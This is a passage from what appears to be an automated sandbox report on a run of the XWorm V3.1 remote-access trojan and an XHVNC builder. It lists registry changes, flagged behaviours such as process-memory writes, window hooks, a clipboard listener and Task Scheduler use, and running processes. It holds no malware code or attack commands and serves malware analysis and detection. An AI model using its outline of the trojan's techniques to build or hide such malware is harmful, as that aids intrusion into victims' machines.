| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\System32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133340175960555971" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "7" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).x = "4294967295" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "694" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Desktop\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0 = 5000310000000000f0560aae10004c6f63616c003c0009000400efbee3567c65f0560aae2e00000098e10100000001000000000000000000000000000000c27b97004c006f00630061006c00000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik | C:\Windows\System32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Downloads" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2 = 720032004bbe5500f056a3ae200058574f524d2d7e322e5a49500000560009000400efbef056a2aef056a3ae2e0000000333020000001400000000000000000000000000000000fd0501580057006f0072006d002d0033002e0031002d006d00610069006e002e007a006900700000001c000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Desktop\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\System32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\System32\rundll32.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0400000000000000020000000300000001000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Desktop\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0\0\0 = 7e00310000000000f056edae100054454d50315f7e312e5a49500000620009000400efbef056edaef056edae2e00000078db010000000800000000000000000000000000000089849600540065006d00700031005f00580057006f0072006d002d0033002e0031002d006d00610069006e002e007a006900700000001c000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\LogicalViewMode = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Generic" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 010000000200000000000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\System32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Users\Admin\Desktop\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\System32\rundll32.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XHVNC.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe22319758,0x7ffe22319768,0x7ffe22319778
C:\Program Files\Google\Chrome\Application\chrome.exe
